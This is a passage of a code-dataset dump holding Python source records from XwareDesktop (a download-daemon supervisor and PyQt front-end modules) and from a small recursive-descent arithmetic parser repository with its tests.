"text": "#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\nimport logging\n\nimport sys, os, time, fcntl, signal, threading\nimport collections\nfrom multiprocessing.connection import Listener\nsys.path.append(os.path.join(os.path.dirname(os.path.realpath(__file__)), \"../\"))\n\nimport pyinotify\n\nfrom shared import constants, BackendInfo\nfrom shared.misc import debounce, tryRemove, tryClose\nfrom shared.profile import profileBootstrap\nfrom settings import SettingsAccessorBase, XWARED_DEFAULTS_SETTINGS\n\n\nclass XwaredCommunicationListener(threading.Thread):\n def __init__(self, _xwared):\n super().__init__(daemon = True,\n name = \"xwared communication listener\")\n self._xwared = _xwared\n\n def run(self):\n with Listener(*constants.XWARED_SOCKET) as listener:\n while True:\n with listener.accept() as conn:\n func, args, kwargs = conn.recv()\n response = getattr(self._xwared, \"interface_\" + func)(*args, **kwargs)\n conn.send(response)\n\n\nclass Xwared(object):\n etmPid = 0\n fdLock = None\n toRunETM = None\n etmStartedAt = None\n etmLongevities = None\n\n # Cfg watchers\n etmCfg = dict()\n watchManager = None\n cfgWatcher = None\n\n def __init__(self):\n super().__init__()\n # requirements checking\n self.ensureNonRoot()\n self.ensureOneInstance()\n\n profileBootstrap(constants.PROFILE_DIR)\n tryRemove(constants.XWARED_SOCKET[0])\n\n # initialize variables\n signal.signal(signal.SIGTERM, self.unload)\n signal.signal(signal.SIGINT, self.unload)\n self.settings = SettingsAccessorBase(constants.XWARED_CONFIG_FILE,\n XWARED_DEFAULTS_SETTINGS)\n self.toRunETM = self.settings.getbool(\"xwared\", \"startetm\")\n self._resetEtmLongevities()\n\n # ipc listener\n self.listener = XwaredCommunicationListener(self)\n self.listener.start()\n\n # using pyinotify to monitor etm.cfg changes\n self.setupCfgWatcher()\n\n def setupCfgWatcher(self):\n # etm.cfg watcher\n self.watchManager = pyinotify.WatchManager()\n self.cfgWatcher = pyinotify.ThreadedNotifier(self.watchManager,\n self.pyinotifyDispatcher)\n self.cfgWatcher.name = \"cfgWatcher inotifier\"\n self.cfgWatcher.daemon = True\n self.cfgWatcher.start()\n self.watchManager.add_watch(constants.ETM_CFG_DIR, pyinotify.ALL_EVENTS)\n\n @debounce(0.5, instant_first=True)\n def onEtmCfgChanged(self):\n try:\n with open(constants.ETM_CFG_FILE, 'r') as file:\n lines = file.readlines()\n\n pairs = {}\n for line in lines:\n eq = line.index(\"=\")\n k = line[:eq]\n v = line[(eq + 1):].strip()\n pairs[k] = v\n self.etmCfg = pairs\n except FileNotFoundError:\n print(\"Xware Desktop: etm.cfg not present at the moment.\")\n\n def pyinotifyDispatcher(self, event):\n if event.maskname != \"IN_CLOSE_WRITE\":\n return\n\n if event.pathname == constants.ETM_CFG_FILE:\n self.onEtmCfgChanged()\n\n @staticmethod\n def ensureNonRoot():\n if os.getuid() == 0 or os.geteuid() == 0:\n print(\"拒绝以root运行\", file = sys.stderr)\n sys.exit(-1)\n\n def ensureOneInstance(self):\n # If one instance is already running, shout so and then exit the program\n # otherwise, a) hold the lock to xwared, b) prepare etm lock\n self.fdLock = os.open(constants.XWARED_LOCK, os.O_CREAT | os.O_RDWR)\n try:\n fcntl.flock(self.fdLock, fcntl.LOCK_EX | fcntl.LOCK_NB)\n except BlockingIOError:\n print(\"xwared已经运行\", file = sys.stderr)\n sys.exit(-1)\n\n print(\"xwared: unlocked\")\n\n def runETM(self):\n while not self.toRunETM:\n time.sleep(1)\n\n if self.settings.getint(\"xwared\", \"startetmwhen\") == 2:\n self.settings.setbool(\"xwared\", \"startetm\", True)\n self.settings.save()\n\n 
self.toRunETM = True\n try:\n self.etmPid = os.fork()\n except OSError:\n print(\"Fork failed\", file = sys.stderr)\n sys.exit(-1)\n\n if self.etmPid == 0:\n # child\n os.putenv(\"CHMNS_LD_PRELOAD\", constants.ETM_PATCH_FILE)\n print(\"child: pid({pid}) ppid({ppid})\".format(pid = os.getpid(),\n ppid = self.etmPid))\n cmd = constants.ETM_COMMANDLINE\n os.execv(cmd[0], cmd)\n sys.exit(-1)\n else:\n # parent\n self.etmStartedAt = time.monotonic()\n print(\"parent: pid({pid}) cpid({cpid})\".format(pid = os.getpid(),\n cpid = self.etmPid))\n self._watchETM()\n\n def _resetEtmLongevities(self):\n sampleNumber = self.settings.getint(\"etm\", \"samplenumberoflongevity\")\n if not isinstance(self.etmLongevities, collections.deque):\n self.etmLongevities = collections.deque(maxlen = sampleNumber)\n\n for i in range(sampleNumber):\n self.etmLongevities.append(float(\"inf\"))\n\n def _watchETM(self):\n os.waitpid(self.etmPid, 0)\n self.etmPid = 0\n\n longevity = time.monotonic() - self.etmStartedAt\n self.etmLongevities.append(longevity)\n threshold = self.settings.getint(\"etm\", \"shortlivedthreshold\")\n if all(map(lambda l: l <= threshold, self.etmLongevities)):\n print(\"xwared: ETM持续时间连续{number}次不超过{threshold}秒,终止执行ETM\"\n .format(number = self.etmLongevities.maxlen,\n threshold = threshold),\n file = sys.stderr)\n print(\"这极有可能是xware本身的bug引起的,更多信息请看 \"\n \"https://github.com/Xinkai/XwareDesktop/wiki/故障排查和意见反馈\"\n \"#etm持续时间连续3次不超过30秒终止执行etm的调试方法\", file = sys.stderr)\n self.toRunETM = False\n\n def stopETM(self, restart):\n if self.etmPid:\n self.toRunETM = restart\n os.kill(self.etmPid, signal.SIGTERM)\n else:\n print(\"ETM not running, ignore stopETM\")\n if self.settings.getint(\"xwared\", \"startetmwhen\") == 2:\n self.settings.setbool(\"xwared\", \"startetm\", restart)\n self.settings.save()\n\n # frontend end interfaces\n def interface_startETM(self):\n self._resetEtmLongevities()\n self.toRunETM = True\n\n def interface_stopETM(self):\n self._resetEtmLongevities()\n self.stopETM(False)\n\n def interface_restartETM(self):\n self._resetEtmLongevities()\n self.stopETM(True)\n\n def interface_start(self):\n if self.settings.getint(\"xwared\", \"startetmwhen\") == 3:\n self.interface_startETM()\n self.settings.setbool(\"xwared\", \"startetm\", True)\n self.settings.save()\n\n def interface_quit(self):\n if self.settings.getint(\"xwared\", \"startetmwhen\") == 3:\n self.stopETM(False)\n self.settings.setbool(\"xwared\", \"startetm\", True)\n self.settings.save()\n\n def interface_getStartEtmWhen(self):\n return self.settings.getint(\"xwared\", \"startetmwhen\")\n\n def interface_setStartEtmWhen(self, startetmwhen):\n self.settings.setint(\"xwared\", \"startetmwhen\", startetmwhen)\n if startetmwhen == 1:\n self.settings.setbool(\"xwared\", \"startetm\", True)\n self.settings.save()\n\n def interface_setMounts(self, mounts):\n raise NotImplementedError()\n\n def interface_getMounts(self):\n raise NotImplementedError()\n\n def interface_infoPoll(self):\n return BackendInfo(etmPid = self.etmPid,\n lcPort = int(self.etmCfg.get(\"local_control.listen_port\", 0)),\n userId = int(self.etmCfg.get(\"userid\", 0)),\n peerId = self.etmCfg.get(\"rc.peerid\", \"\"))\n\n def unload(self, sig, stackframe):\n print(\"unloading...\")\n self.stopETM(False)\n\n tryClose(self.fdLock)\n tryRemove(constants.XWARED_LOCK)\n self.settings.save()\n\n sys.exit(0)\n\nif __name__ == \"__main__\":\n xwared = Xwared()\n while True:\n xwared.runETM()\n"
},
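`Xwared.ensureOneInstance` in the record above uses a non-blocking exclusive `flock` on a lock file to refuse to start a second daemon. The same guard as a standalone sketch (the lock path is a placeholder; the real one comes from `shared.constants.XWARED_LOCK`):

```python
# Sketch of the single-instance guard in Xwared.ensureOneInstance above.
import fcntl, os, sys

LOCK_PATH = "/tmp/example.lock"  # placeholder path

fd = os.open(LOCK_PATH, os.O_CREAT | os.O_RDWR)
try:
    # LOCK_NB makes flock fail immediately instead of waiting.
    fcntl.flock(fd, fcntl.LOCK_EX | fcntl.LOCK_NB)
except BlockingIOError:
    print("already running", file=sys.stderr)
    sys.exit(-1)
print("lock acquired; this process is the only instance")
```

Because the kernel releases the lock when the holder exits, a crashed daemon never leaves a stale lock behind.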
{
"alpha_fraction": 0.6648589968681335,
"alphanum_fraction": 0.6670281887054443,
"avg_line_length": 27.8125,
"blob_id": "3b9108af15f10f04e0070572f1e4122532ea44a4",
"content_id": "796b509eeb8461a7667c55316b9ee95c1e82ea3e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 922,
"license_type": "no_license",
"max_line_length": 69,
"num_lines": 32,
"path": "/src/frontend/models/AdapterManager.py",
"repo_name": "Benyjuice/XwareDesktop",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\nfrom launcher import app\nfrom PyQt5.QtCore import QObject, pyqtSignal, pyqtProperty\n\nfrom collections import OrderedDict\n\n\nclass AdapterManager(QObject):\n ulSpeedChanged = pyqtSignal()\n dlSpeedChanged = pyqtSignal()\n\n def __init__(self, parent = None):\n super().__init__(parent)\n self._adapters = OrderedDict()\n\n @pyqtProperty(int, notify = ulSpeedChanged)\n def ulSpeed(self):\n return sum(map(lambda a: a.ulSpeed, self._adapters.values()))\n\n @pyqtProperty(int, notify = dlSpeedChanged)\n def dlSpeed(self):\n return sum(map(lambda a: a.dlSpeed, self._adapters.values()))\n\n def registerAdapter(self, adapter):\n ns = adapter.namespace\n assert ns not in self._adapters\n adapter.update.connect(app.taskModel.taskManager.updateMap)\n self._adapters[ns] = adapter\n\n def adapter(self, ns):\n return self._adapters[ns]\n"
},
{
"alpha_fraction": 0.6525285243988037,
"alphanum_fraction": 0.655791163444519,
"avg_line_length": 28.190475463867188,
"blob_id": "dd4a9f748fb034401aafaf5c974342db573f6ec7",
"content_id": "329e9d2180149d5e26cca286dfb19326192c3ed7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1226,
"license_type": "no_license",
"max_line_length": 67,
"num_lines": 42,
"path": "/src/frontend/systray.py",
"repo_name": "Benyjuice/XwareDesktop",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\nimport logging\nfrom launcher import app\n\nfrom PyQt5.QtCore import pyqtSlot, QObject\nfrom PyQt5.QtGui import QIcon\nfrom PyQt5.QtWidgets import QSystemTrayIcon\n\nfrom contextmenu import ContextMenu\n\n\nclass Systray(QObject):\n trayIconMenu = None\n\n def __init__(self, parent):\n super().__init__(parent)\n\n self.trayIconMenu = ContextMenu(None)\n\n icon = QIcon.fromTheme(\"xware-desktop\")\n\n self.trayIcon = QSystemTrayIcon(self)\n self.trayIcon.setIcon(icon)\n self.trayIcon.setContextMenu(self.trayIconMenu)\n self.trayIcon.setVisible(True)\n\n self.trayIcon.activated.connect(self.slotSystrayActivated)\n\n @pyqtSlot(QSystemTrayIcon.ActivationReason)\n def slotSystrayActivated(self, reason):\n if reason == QSystemTrayIcon.Context: # right\n pass\n elif reason == QSystemTrayIcon.MiddleClick: # middle\n pass\n elif reason == QSystemTrayIcon.DoubleClick: # double click\n pass\n elif reason == QSystemTrayIcon.Trigger: # left\n if app.mainWin.isHidden() or app.mainWin.isMinimized():\n app.mainWin.restore()\n else:\n app.mainWin.minimize()\n"
},
{
"alpha_fraction": 0.6480018496513367,
"alphanum_fraction": 0.6500929594039917,
"avg_line_length": 30.647058486938477,
"blob_id": "685e7354991e162089ba4a3b7179ea44e2a788eb",
"content_id": "0010f7b4d779504f5ff8e08d8f3a520270756bf5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4328,
"license_type": "no_license",
"max_line_length": 92,
"num_lines": 136,
"path": "/src/frontend/Schedule/__init__.py",
"repo_name": "Benyjuice/XwareDesktop",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\nimport logging\nfrom launcher import app\n\nfrom PyQt5.QtCore import QObject, pyqtSignal, pyqtSlot\n\nfrom Schedule.SchedulerCountdown import CountdownMessageBox\nfrom Schedule.PowerAction import PowerActionManager, ACTION_NONE\n\nALL_TASKS_COMPLETED = 0\nSELECTED_TASKS_COMPLETED = 1\n\n\nclass Scheduler(QObject):\n # connects PowerActionManager and SchedulerWin, also does confirmation.\n\n sigSchedulerSummaryUpdated = pyqtSignal()\n sigActionConfirmed = pyqtSignal(bool)\n\n POSSIBLE_ACTWHENS = (\n (ALL_TASKS_COMPLETED, \"所有的\"),\n (SELECTED_TASKS_COMPLETED, \"选中的\"),\n )\n\n _actionId = None\n _actWhen = None\n _waitingTaskIds = None # user-selected tasks\n _stillWaitingTasksNumber = 0 # (computed) user-selected tasks - nolonger running tasks\n confirmDlg = None\n\n def __init__(self, parent):\n super().__init__(parent)\n self._waitingTaskIds = set()\n self.reset()\n\n self.powerActionManager = PowerActionManager(self)\n self.actions = self.powerActionManager.actions\n\n app.etmpy.runningTasksStat.sigTaskNolongerRunning.connect(self.slotMayAct)\n app.etmpy.runningTasksStat.sigTaskAdded.connect(self.slotMayAct)\n self.sigActionConfirmed[bool].connect(self.slotConfirmed)\n\n @property\n def actWhen(self):\n # tasks\n return self._actWhen\n\n @actWhen.setter\n def actWhen(self, value):\n raise NotImplementedError(\"use set method\")\n\n @property\n def waitingTaskIds(self):\n return self._waitingTaskIds\n\n @waitingTaskIds.setter\n def waitingTaskIds(self, value):\n raise NotImplementedError(\"use set method\")\n\n @property\n def actionId(self):\n return self._actionId\n\n @actionId.setter\n def actionId(self, value):\n raise NotImplementedError(\"use set method\")\n\n def getActionNameById(self, actionId):\n return self.powerActionManager.getActionById(actionId).displayName\n\n def getSummary(self):\n # return either True / False / str\n # True -> action undergoing, system shutting down\n # False -> scheduled to do nothing\n # str -> one sentence summary\n if self.actionId == ACTION_NONE:\n return False\n\n if self._stillWaitingTasksNumber:\n return \"{}个任务结束后{}\".format(\n self._stillWaitingTasksNumber,\n self.getActionNameById(self.actionId))\n else:\n return True\n\n @pyqtSlot(int)\n def slotMayAct(self):\n if self.actionId == ACTION_NONE:\n self.sigSchedulerSummaryUpdated.emit()\n logging.info(\"cancel schedule because action is none\")\n return\n\n runningTaskIds = app.etmpy.runningTasksStat.getTIDs()\n if self.actWhen == SELECTED_TASKS_COMPLETED:\n stillWaitingTaskIds = set(runningTaskIds) & self.waitingTaskIds\n self._stillWaitingTasksNumber = len(stillWaitingTaskIds)\n elif self.actWhen == ALL_TASKS_COMPLETED:\n self._stillWaitingTasksNumber = len(runningTaskIds)\n else:\n raise Exception(\"Unknown actWhen.\")\n\n if self._stillWaitingTasksNumber > 0:\n self.sigSchedulerSummaryUpdated.emit()\n logging.info(\"not take action because desired tasks are running.\")\n return\n\n self.confirmDlg = CountdownMessageBox(self.getActionNameById(self.actionId))\n self.confirmDlg.show()\n self.confirmDlg.activateWindow()\n self.confirmDlg.raise_()\n\n def set(self, actWhen, taskIds, actionId):\n if actWhen == SELECTED_TASKS_COMPLETED:\n self._actWhen, self._waitingTaskIds, self._actionId = actWhen, taskIds, actionId\n else:\n self._actWhen, self._actionId = actWhen, actionId\n\n self.slotMayAct()\n\n def reset(self):\n # Should be called when\n # 1. app starts up\n # 2. immediately before power-control commands are run\n # 3. 
action is canceled by user\n self.set(ALL_TASKS_COMPLETED, set(), ACTION_NONE)\n\n @pyqtSlot(int)\n def slotConfirmed(self, confirmed):\n del self.confirmDlg\n if confirmed:\n _actionId = self.actionId\n self.powerActionManager.act(_actionId)\n self.reset()\n else:\n self.reset()\n"
},
{
"alpha_fraction": 0.5723153352737427,
"alphanum_fraction": 0.5785226821899414,
"avg_line_length": 34.406593322753906,
"blob_id": "2ec719004609b05bbc256ef26df0cb1a77354a2f",
"content_id": "429c9fe39228ee1a33161c864e5ad908a414d95b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3222,
"license_type": "no_license",
"max_line_length": 91,
"num_lines": 91,
"path": "/src/frontend/monitor.py",
"repo_name": "Benyjuice/XwareDesktop",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\nimport logging\nfrom launcher import app\n\nfrom PyQt5.QtCore import pyqtSignal, pyqtSlot, Qt, QPoint\n\nimport threading, time\n\nfrom ui_monitor import MonitorWidget, Ui_MonitorWindow\nfrom PersistentGeometry import PersistentGeometry\nfrom contextmenu import ContextMenu\n\n\nclass MonitorWindow(MonitorWidget, Ui_MonitorWindow, PersistentGeometry):\n sigTaskUpdating = pyqtSignal(dict)\n\n _stat = None\n _thread = None\n _thread_should_stop = False\n\n TICKS_PER_TASK = 4\n TICK_INTERVAL = 0.5 # second(s)\n\n _contextMenu = None\n\n def __init__(self, parent = None):\n super().__init__(parent)\n self.setupUi(self)\n self.setStyleSheet(\"background-color: rgba(135, 206, 235, 0.8)\")\n self.setAttribute(Qt.WA_TranslucentBackground)\n self.setAttribute(Qt.WA_DeleteOnClose)\n\n app.settings.applySettings.connect(self._setMonitorFullSpeed)\n self._setMonitorFullSpeed()\n\n self._thread = threading.Thread(target = self.updateTaskThread,\n name = \"monitor task updating\",\n daemon = True)\n self._thread.start()\n self.preserveGeometry()\n\n self._contextMenu = ContextMenu(None)\n self.setContextMenuPolicy(Qt.CustomContextMenu)\n self.customContextMenuRequested.connect(self.showContextMenu)\n\n def updateTaskThread(self):\n while True:\n runningTaskIds = app.etmpy.runningTasksStat.getTIDs()\n if runningTaskIds:\n for tid in runningTaskIds:\n for i in range(self.TICKS_PER_TASK):\n task = app.etmpy.runningTasksStat.getTask(tid)\n\n time.sleep(self.TICK_INTERVAL)\n if self._thread_should_stop:\n return # end the thread\n\n logging.debug(\"updateSpeedsThread, deadlock incoming, maybe\")\n try:\n self.sigTaskUpdating.emit(task)\n except TypeError:\n # monitor closed\n return # end the thread\n\n # FIXME: move the sleep function ahead, before sigTaskUpdating.emit\n # it seems to make the deadlock go away.\n # time.sleep(self.TICK_INTERVAL)\n else:\n time.sleep(self.TICK_INTERVAL)\n if self._thread_should_stop:\n return # end the thread\n try:\n self.sigTaskUpdating.emit(dict())\n except TypeError:\n # monitor closed\n return # end the thread\n\n @pyqtSlot()\n def _setMonitorFullSpeed(self):\n fullSpeed = app.settings.getint(\"frontend\", \"monitorfullspeed\")\n logging.info(\"monitor full speed -> {}\".format(fullSpeed))\n self.graphicsView.FULLSPEED = 1024 * fullSpeed\n\n def closeEvent(self, qCloseEvent):\n self._thread_should_stop = True\n super().closeEvent(qCloseEvent)\n\n @pyqtSlot(QPoint)\n def showContextMenu(self, qPoint):\n self._contextMenu.exec(self.mapToGlobal(qPoint))\n"
},
{
"alpha_fraction": 0.5367819666862488,
"alphanum_fraction": 0.5394692420959473,
"avg_line_length": 32.449440002441406,
"blob_id": "7b0874ec03901028b24e1e3f352551f87cfe1712",
"content_id": "d2da8438dff381960512bf501313794cb31fd95b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3137,
"license_type": "no_license",
"max_line_length": 95,
"num_lines": 89,
"path": "/src/frontend/CrashReport/CrashReportApp.py",
"repo_name": "Benyjuice/XwareDesktop",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\nfrom PyQt5.Qt import pyqtSlot, QDesktopServices, QUrl\nfrom PyQt5.QtWidgets import QDialog, QApplication\nfrom ui_crashreport import Ui_Dialog\nimport os, sys, subprocess\nimport html\nsys.path.append(os.path.join(os.path.dirname(os.path.realpath(__file__)), \"../../\"))\ntry:\n from shared import __githash__\nexcept ImportError:\n __githash__ = None\nfrom __init__ import CrashReport\n\n\nclass CrashReportForm(QDialog, Ui_Dialog):\n def __init__(self, parent = None):\n super().__init__(parent)\n self.setupUi(self)\n\n self.pushButton_github.clicked.connect(self.reportToGithub)\n self.pushButton_close.clicked.connect(self.reportToNone)\n\n def setPayload(self, payload):\n if not __githash__:\n githash = \"开发版\"\n else:\n githash = __githash__\n\n self.textBrowser.setHtml(\n \"发行版: {lsb_release}<br />\"\n \"桌面环境: {xdg_current_desktop}/{desktop_session}<br />\"\n \"版本: {githash}<br /><br />\"\n \"<b style='color: orange'>补充描述计算机。</b><br />可留空。<br /><br />\"\n\n \"<b style='color: orange'>简述在什么情况下发生了这个问题。</b><br />可留空。<br /><br />\"\n\n \"======================== 报告 ========================<br />\"\n \"错误发生在{threadName}<br />\"\n \"```<pre style='color:grey; font-family: Arial;'>\"\n \"{traceback}\"\n \"</pre>```<br />\"\n \"======================== 结束 ========================<br />\"\n .format(lsb_release = self.lsb_release(),\n xdg_current_desktop = os.environ.get(\"XDG_CURRENT_DESKTOP\", \"未知\"),\n desktop_session = os.environ.get(\"DESKTOP_SESSION\", \"未知\"),\n githash = githash,\n threadName = payload[\"thread\"],\n traceback = html.escape(payload[\"traceback\"]))\n )\n\n @staticmethod\n def lsb_release():\n try:\n with subprocess.Popen([\"lsb_release\", \"-idrcs\"], stdout = subprocess.PIPE) as proc:\n return proc.stdout.read().decode(\"UTF-8\")\n except FileNotFoundError:\n return \"发行版类型及版本获取失败。\"\n\n @pyqtSlot()\n def reportToGithub(self):\n qurl = QUrl(\"http://github.com/Xinkai/XwareDesktop/issues/new\")\n QDesktopServices.openUrl(qurl)\n\n @pyqtSlot()\n def reportToNone(self):\n self.close()\n\n\nclass CrashReportApp(QApplication):\n def __init__(self, argv):\n super().__init__(argv)\n self.form = CrashReportForm()\n if len(argv) > 1:\n payload = CrashReport.decodePayload(argv[1])\n else:\n payload = {\n \"thread\": \"测试线程\",\n \"traceback\": \"\"\"Traceback (most recent call last):\n File \"<模拟崩溃报告>\", line 1, in <module>\nZeroDivisionError: division by zero\"\"\",\n }\n self.form.setPayload(payload)\n self.form.show()\n\nif __name__ == \"__main__\":\n app = CrashReportApp(sys.argv)\n sys.exit(app.exec())\n"
}
] | 33 |
aadibajpai/parser
|
https://github.com/aadibajpai/parser
|
4c306534326181b2062af3762e9fbb71ac59f145
|
02fe95b81b131b6bb74698f5b23ed6a0bdd05152
|
249b6d4684a6cef03d0c7ef740b7576049976f46
|
refs/heads/master
| 2023-08-11T02:13:49.206128 | 2021-10-14T20:10:39 | 2021-10-14T20:10:39 | 416,147,279 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.2612021863460541,
"alphanum_fraction": 0.35628414154052734,
"avg_line_length": 32.88888931274414,
"blob_id": "c6eb5044c81256d25b3828ce18910b6519d867ec",
"content_id": "6179c5e202a96cf44f6d80007fd6386343a25c49",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 915,
"license_type": "no_license",
"max_line_length": 81,
"num_lines": 27,
"path": "/test_parser.py",
"repo_name": "aadibajpai/parser",
"src_encoding": "UTF-8",
"text": "import pytest\n\nfrom Parse import Parse\n\n# the expression and the expected tree for it\n# easier to test than valid assembly that depends on this anyway\nexpr_trees = [\n (\"12\", 12),\n (\"(12)\", 12),\n (\"3 + 4 * 2\", (3, \"+\", (4, \"*\", 2))),\n (\"3 * 4 + 2\", ((3, \"*\", 4), \"+\", 2)),\n (\"(3 + 4) * 2\", ((3, \"+\", 4), \"*\", 2)),\n (\"(((3 + 4) * 2 + 4))\", (((3, \"+\", 4), \"*\", 2), \"+\", 4)),\n (\"(12 * 2) + ((2 + 4) * 3)) * (((3 * 2) + 4))\", None),\n (\"2 + ((3 (((5 + 7) * 2)) + 17 * 3) + 1) * 3\", None),\n (\"(((((2 * 3) + 1) )))\", ((2, \"*\", 3), \"+\", 1)),\n (\n \"(( 3 * 32) + 1) * ((2 + 7 * 2) + ((4 * 3)))\",\n (((3, \"*\", 32), \"+\", 1), \"*\", ((2, \"+\", (7, \"*\", 2)), \"+\", (4, \"*\", 3))),\n ),\n (\"(12 * (2 + 4) * 3)\", (12, \"*\", ((2, \"+\", 4), \"*\", 3))),\n]\n\n\[email protected](\"input, expected\", expr_trees)\ndef test_parse_tree(input, expected):\n assert Parse(input).parser() == expected\n"
},
{
"alpha_fraction": 0.739130437374115,
"alphanum_fraction": 0.7739130258560181,
"avg_line_length": 27.5,
"blob_id": "cdde9d84e6ae9005d8edf71f6f8c1f394e153e09",
"content_id": "f95fc7e56256f70ebaabdb8df3733b9ab15adfb8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 115,
"license_type": "no_license",
"max_line_length": 75,
"num_lines": 4,
"path": "/README.md",
"repo_name": "aadibajpai/parser",
"src_encoding": "UTF-8",
"text": "# parser\ncs 3252 extra credit parser\n\nthe github workflow runs all the inputs in `inputs.txt` against the parser. \n"
},
{
"alpha_fraction": 0.5434988737106323,
"alphanum_fraction": 0.5482442378997803,
"avg_line_length": 19.52597427368164,
"blob_id": "15db720e6c2f6542f4b452f775ad1f108661d97f",
"content_id": "61c572a80db1ff5b6a29a9a4a5217fe0e7affaf1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3167,
"license_type": "no_license",
"max_line_length": 76,
"num_lines": 154,
"path": "/parser.py",
"repo_name": "aadibajpai/parser",
"src_encoding": "UTF-8",
"text": "import re\n\n# use a global variable which isn't ideal\n# but I wanted to avoid all the boilerplate that comes with a class\n# since we primarily care about the logic\nexpr = input(\"enter the expression or q to exit: \")\n\n# match numbers\nNUM = re.compile(r\"(?P<NUM>\\d+)\")\n\n\ndef generate(expr):\n \"\"\"\n generate assembly code for an expression\n traverses the parse \"tree\" recursively\n e.g. for (12 * (2 + 4) * 3), the tree looks like\n (12, '*', ((2, '+', 4), '*', 3))\n \"\"\"\n # check for int and string since python doesn't have pattern matching\n if isinstance(expr, int):\n print(f\".load {expr}\")\n return\n\n elif isinstance(expr, str):\n print(\".mult\" if expr == \"*\" else \".add\")\n return\n\n # if we're here then we have a triplet\n left, middle, right = expr\n\n # post order traversal\n generate(left)\n generate(right)\n generate(middle)\n\n\ndef parser():\n \"\"\"\n the actual parsing function,\n processes the expression and handles getting the next expression\n \"\"\"\n global expr\n\n while expr != \"q\":\n print(f\"expression: {expr}\")\n expr = expr.replace(\" \", \"\") # strip whitespace\n\n try:\n ex = e() # call e since it's the first production rule\n\n # valid iff no error and all of expression consumed\n print(\"valid\" if not expr else f\"invalid, {expr=}\")\n print(f\"parse tree: {ex}\") # the generated tree\n print()\n\n generate(ex)\n\n except (IndexError, ValueError):\n # handle invalid expressions\n print(\"invalid\")\n\n print()\n expr = input(\"enter your expression or q to exit: \")\n print()\n\n\ndef advance(offset=1):\n \"\"\"\n consumes string based on the rule applied\n \"\"\"\n global expr\n expr = expr[offset:]\n\n\ndef e():\n \"\"\"\n E → P + E | P\n \"\"\"\n prod = p()\n\n # need to check to verify if it is P + E\n if expr and expr[0] == \"+\":\n match(\"+\")\n ex = e()\n # we return tuples to represent a node and its left and right nodes\n # since then we can apply tuple unpacking to neatly process the tree\n return (prod, \"+\", ex)\n\n return prod\n\n\ndef p():\n \"\"\"\n P → T * P | T\n \"\"\"\n term = t()\n\n if expr and expr[0] == \"*\":\n match(\"*\")\n prod = p()\n return (term, \"*\", prod)\n\n return term\n\n\ndef t():\n \"\"\"\n T → Num | (E)\n \"\"\"\n if expr[0] == \"(\":\n match(\"(\")\n ex = e()\n match(\")\")\n\n return ex\n\n # numbers are the leafs of our tree\n # so we just keep them as ints and not tuples\n return read_number()\n\n\ndef match(symbol):\n \"\"\"\n match provided symbol to the next element in expression\n \"\"\"\n next = expr[0]\n advance()\n\n if next != symbol:\n raise ValueError\n\n\ndef read_number():\n \"\"\"\n read a number from the expression\n \"\"\"\n if not expr:\n return\n\n match = NUM.match(expr)\n\n if not match:\n raise ValueError\n\n # get the actual number from the match object\n number = match.group(\"NUM\")\n\n advance(len(number))\n\n return int(number)\n\n\nif __name__ == \"__main__\":\n parser()\n"
},
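The `.load`/`.add`/`.mult` lines that `generate()` in the file above prints form a stack-machine program; emitting them in post-order guarantees both operands are already on the stack when an operator executes. A small evaluator makes that concrete (the instruction names follow the file above):

```python
# Sketch: evaluate the stack program that generate() above prints.
def run(program):
    stack = []
    for line in program:
        op, *arg = line.split()
        if op == ".load":
            stack.append(int(arg[0]))
        elif op == ".add":
            stack.append(stack.pop() + stack.pop())
        elif op == ".mult":
            stack.append(stack.pop() * stack.pop())
    return stack.pop()

# Post-order traversal of (3, '+', (4, '*', 2)) emits exactly this program:
assert run([".load 3", ".load 4", ".load 2", ".mult", ".add"]) == 11
```

For `3 + 4 * 2` the parser builds `(3, '+', (4, '*', 2))`, and the evaluator reproduces the expected value, confirming the post-order code generation is sound.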
{
"alpha_fraction": 0.49413490295410156,
"alphanum_fraction": 0.4985337257385254,
"avg_line_length": 23.184396743774414,
"blob_id": "12554586b38f96a7969dd7ad7fb97ecc21e42e68",
"content_id": "5187cd83c072c43688f24dd1637043b6671e931f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3416,
"license_type": "no_license",
"max_line_length": 81,
"num_lines": 141,
"path": "/Parse.py",
"repo_name": "aadibajpai/parser",
"src_encoding": "UTF-8",
"text": "import re\n\n# match numbers\nNUM = re.compile(r\"(?P<NUM>\\d+)\")\n\n\nclass Parse:\n def __init__(self, expr):\n self.expr = expr\n\n @classmethod\n def generate(self, node):\n \"\"\"\n generate assembly code for an expression\n traverses the parse \"tree\" recursively\n e.g. for (12 * (2 + 4) * 3), the tree looks like\n (12, '*', ((2, '+', 4), '*', 3))\n \"\"\"\n # invalid expression\n if not node:\n return\n\n # check for int and string since python doesn't have pattern matching\n if isinstance(node, int):\n print(f\".load {node}\")\n return\n\n elif isinstance(node, str):\n print(\".mult\" if node == \"*\" else \".add\")\n return\n\n # if we're here then we have a triplet\n left, middle, right = node\n\n # post order traversal\n self.generate(left)\n self.generate(right)\n self.generate(middle)\n\n def parser(self):\n \"\"\"\n the actual parsing function,\n processes the expression and handles getting the next expression\n \"\"\"\n self.expr = self.expr.replace(\" \", \"\") # strip whitespace\n\n try:\n ex = self.e() # call e since it's the first production rule\n\n # valid iff no error and all of expression consumed\n if self.expr:\n return None\n\n return ex\n\n except (IndexError, ValueError):\n # handle invalid expressions\n return 